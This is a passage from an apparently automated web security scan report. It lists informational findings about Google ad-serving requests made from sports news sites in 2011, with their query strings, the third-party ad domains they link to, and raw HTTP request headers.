aRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAb7YkssDkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=http://clk.atdmt.com/MON/go/285072717/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/MON/view/285072717/direct/01/" /></a></noscript></iframe><img src="http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX2DwANMM0K7F5Hv-hpRkYZvFfKu_HkGEZFIg&r=1686505843&rand=24760&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=70.42.105.14&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAb7YkssDkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.149. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165228&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966165257&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=2137&xpc=7nE7Cveef1&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://s0.2mdn.net/2757332/FathersDay_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHvLkq8PgA6ijSXmI436MWcdZspSA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165228&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966165257&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=2137&xpc=7nE7Cveef1&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.150. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988151&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970150009&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307970149989&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1346432479&ga_fc=1&u_tz=-300&u_his=26&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1373&xpc=gUxaRla3o1&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2331885/5-728x90_AAA_Katherine.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988151&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970150009&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307970149989&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1346432479&ga_fc=1&u_tz=-300&u_his=26&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1373&xpc=gUxaRla3o1&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.151. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983859&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965859912&bpp=2&shv=r20110608&jsv=r20110607&correlator=1307965859956&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=87&xpc=3UBUFYBaL6&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX5pAAK0OwK5TnMjOVaC9_VnNvwbfs_Ry-erw&r=379112275&rand=33578&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=1,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=64.74.116.152&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAY-NwNAIkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox
http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBQKjZpPn1TeyhK8zzlAeLtJXnCI6foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALAB8ACBMgC9vHKCagDAegDiALoA7UI9QMAAADAgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtwi7IGfM9_W7twNlJnrq2mZtDX0pA%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.33578;rtbip=64.74.116.152;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAY-NwNAIkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=
http://view.atdmt.com/MON/view/285072717/direct/01/

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983859&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965859912&bpp=2&shv=r20110608&jsv=r20110607&correlator=1307965859956&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=87&xpc=3UBUFYBaL6&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:51:01 GMT
Server: cafe
Cache-Control: private
Content-Length: 4129
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBQKjZpPn1TeyhK8zzlAeLtJXnCI6foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALAB8ACBMgC9vHKCagDAegDiALoA7UI9QMAAADAgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtwi7IGfM9_W7twNlJnrq2mZtDX0pA%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.33578;rtbip=64.74.116.152;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAY-NwNAIkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
aRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAY-NwNAIkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=http://clk.atdmt.com/MON/go/285072717/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/MON/view/285072717/direct/01/" /></a></noscript></iframe><img src="http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX5pAAK0OwK5TnMjOVaC9_VnNvwbfs_Ry-erw&r=379112275&rand=33578&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=1,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=64.74.116.152&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAY-NwNAIkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.152. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1747433502656032&output=html&h=250&slotname=5971138435&w=250&lmt=1307980689&flash=10.3.181&url=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&dt=1307962930665&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962931010&frm=4&adk=3116141599&ga_vid=1991767657.1307962895&ga_sid=1307962895&ga_hid=798484996&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&fu=0&ifi=1&dtd=8183&xpc=pxKruGYxhr&p=http%3A//www.mavsmoneyball.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26hl%3Den%26client%3Dca-pub-1747433502656032%26adU%3Dwww.Wix.com/Free-Website-Templates%26adT%3DFree%2BWebsite%2BTemplates%26adU%3Dwww.facebook.com/EmpiresAndAllies%26adT%3DTop%2BNew%2BStrategy%2BGame%26adU%3DVovici.com/Enterprise-Feedback%26adT%3DGet%2BA%2B360%25C2%25B0%2BCustomer%2BView%26gl%3DUS&usg=AFQjCNE-F3gyL3UUN0Nd9cf3HZpu1WzNrg

Request

Response

18.153. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982322&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318938&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964318556&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=3167&xpc=Xq1icALNsj&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMbCAQVosTYM_ayDGovBdy-i8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA1xABAgUCAQQAAAAACB-akAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17892%2C+1307964322%29%3Buf%28%27c%27%2C+89145%2C+1307964322%29%3Buf%28%27r%27%2C+447816%2C+1307964322%29%3B&cnd=!yRy62gi5uAUQyKobGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!7QRzKAi5uAUQyKobGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfXzogALBokK5XaLns835z3qoL_VahW9PFeZfA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmcz2ovP1TYmNLIvtlQfn77z2Cdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtzdPTl7nHPOyy0L0zrT-TotQBtEWw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982322&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318938&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964318556&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=3167&xpc=Xq1icALNsj&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.154. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307981049&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307963587341&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307963587446&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1388075362&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&fu=0&ifi=1&dtd=227&xpc=ofekJ7Kijd&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/fansided/General_Twackle_Widget%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTV%2BIn%2BYour%2BArea%26gl%3DUS&usg=AFQjCNFco47ISZjqDFPdJRJmPFTvF2tw0g

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307981049&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307963587341&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307963587446&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1388075362&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&fu=0&ifi=1&dtd=227&xpc=ofekJ7Kijd&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.155. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532129&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307969532175&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=16&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=91&xpc=WFmHYMGXum&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3Dwww.CallSource.com%26adT%3DPerformance%2BBase%2BTracking%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26gl%3DUS&usg=AFQjCNGGC9FjZ3BX5ASz3cukuUd9xml5dA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532129&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307969532175&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=16&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=91&xpc=WFmHYMGXum&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.156. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468276&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307966468319&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=71&xpc=2rx0QIUY1e&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DComcast%25C2%25AE%2BLocal%2BCable%26adU%3Dwww.FitTrackingSolutions.com%26adT%3DTrack%2BYour%2BAction%2BItems%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26gl%3DUS&usg=AFQjCNFG7frj4RBGSj-axpO4PakFRI5hZQ

Request

